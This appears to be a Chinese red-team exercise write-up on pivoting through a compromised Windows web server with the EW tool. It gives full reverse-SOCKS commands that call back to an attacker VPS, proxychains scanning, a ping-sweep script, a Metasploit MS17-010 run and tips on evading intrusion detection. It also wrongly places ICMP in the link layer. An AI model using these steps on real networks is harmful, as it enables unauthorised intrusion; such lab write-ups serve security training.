一、前言

最近一周护网进行了内网渗透 这里做个人小结 也方便其他小伙伴学习EW。这里仅记录后渗
透中与EW相关的部分 已提前在tomcat中留下冰蝎马。


二、本文介绍

1.准备工作
2.EW是什么，可以做什么。
3.内网模拟(基础环境及网络拓扑)
4.EW代理实战
6.利用proxychains代理寻找MS17-010。

三、准备工作

1.模拟环境需要natapp.cn这类NAT穿透工具 注册账号购买免费web映射套餐。
2.EW内网穿透工具，https://github.com/idlefire/ew
3.一台Ubuntu VPS,端口开放10000-65535
4.若干台WINDOWS虚拟机在NAT网络下运行。

四、EW简介

EW是一款四年前开发好的NAT穿透工具 具有 SOCKS v5服务架设和端口转发两大核心功能 可在复杂网络环境下完成
网络穿透代理服务 能够以 正向  反向 多级级联 等方式打通一条网络隧道 帮助内网渗透直达网络深处。 工具包中提供
了多种可执行文件 以适用不同的操作系统，Linux、Windows、MacOS、Arm-Linux 均被包括其内。

EW共有 6 种命令格式 ssocksd正向 rcsocks反弹 rssocks反弹 lcx_slave级联  lcx_listen级联  lcx_tran级联 。其中SOCKS5
服务的核心逻辑支持由ssocksd 和 rssocks 提供 分别对应正向与反向socks代理 其余的lcx 链路状态用于打通测试主机同
socks 服务器之间的通路。这里篇幅有限 仅介绍危害最大的rssocks。

同类工具还有socat 就实战来看 EW操作较简单 SOCAT有时会发生段错误 而EW则比较稳定。

防守方如需查杀规则查看 https://github.com/rootkiter/Binary-files项目。

五、内网模拟


Kali Linux Attacker 内网 172.16.33.129
Ubuntu 16.04.3 Attacker 公网 120.53.123.X
Windows 7肉鸡 WEB服务器 172.2.40.129
Windows 7 SP1 肉鸡内网其他机器 172.2.40.X

网络拓扑：Kali Linux是攻击者 Ubuntu是公网上的一台VPS Windows 7是目标机器无外网IP
8080端口通过NAT穿透工具映射到外网提供WEB服务。


六、EW代理实战

数据流向:  黑客KALI SOCKS v5 <-> VPS 10801 <-> VPS 10241 <-> 肉鸡 rssocks
操作在 公网IP主机 和 WEB肉机上进行 目的是通过反弹方式创建socks代理。
第一步 在VPS上将Github下回的 EW 项目解压并执行：
./ew_for_linux64 -s rcsocks -l 10801 -e 10241   

这句话的意思是 在 120.53.123.X  VPS主机添加转换隧道 其中10801端口供黑客使用 10241端口供
肉鸡通道连接 黑客连接10801 本质是反连VPS的10241端口。


第二步 在WEB主机 172.2.40.129上执行：
ew_for_Win.exe -s rssocks -d 120.53.123.X -e 10241
这句话的意思是 在WEB肉鸡上开启socks5代理服务 具体端口依据VPS端设定这里
的10241仅与VPS通信使用。上传ew到选定的目录。


肉鸡网络环境


肉鸡内网其他机器


工具使用第三步 在KALI上：vim /etc/proxychains.conf

socks5  120.53.123.X 10241


这里用SOCKS5 因为是WIN的主机 还有一个选择--弹到CS CS代理为SOCKS4。
注意验证SOCKS是否打通
proxychains nmap -sT hosts -p port


七、内网探测

proxy nmap targetIP

慎用扫描 流量动静大 速度慢 不稳定 时间长 容易断 。
NetBIOS ICMP均可以探测存活主机 前者仅探测WIN 后者遇到禁ping摸瞎。
还有ARP探测特征比较明显。三者权衡 因此进入陌生环境 首选ICMP。
如果是Linux用bash脚本 如果是Win用bat脚本或上PS如Empire的arpscan
模块Nishang的Invoke-ARPScan.ps1。
cmd命令可保存成bat后执行： for /l %%p in (1,1,254) do ping 172.2.40.
%%p -n 1 -w 5 |find "TTL" >./ipcheck.log
也可先执行 arp -a看缓存结果。
注意Socks协议只能下到网络层 ICMP属于链路层无法代理。
因此proxychains ping命令不能正常工作。


验证内网WIN主机是否开启防火墙


八、MSF漏洞验证

proxychains msfconsole
search 17_010
use 1
set rhost 172.2.40.128
exploit


九、总结

内网中有许多监控设备 有HIDS和NIDS其中规避HIDS需对工具免杀 规避NIDS需慎用扫描避免踩雷
学习上 搭靶场多积累经验 了解安全设备检测原理避免被针对。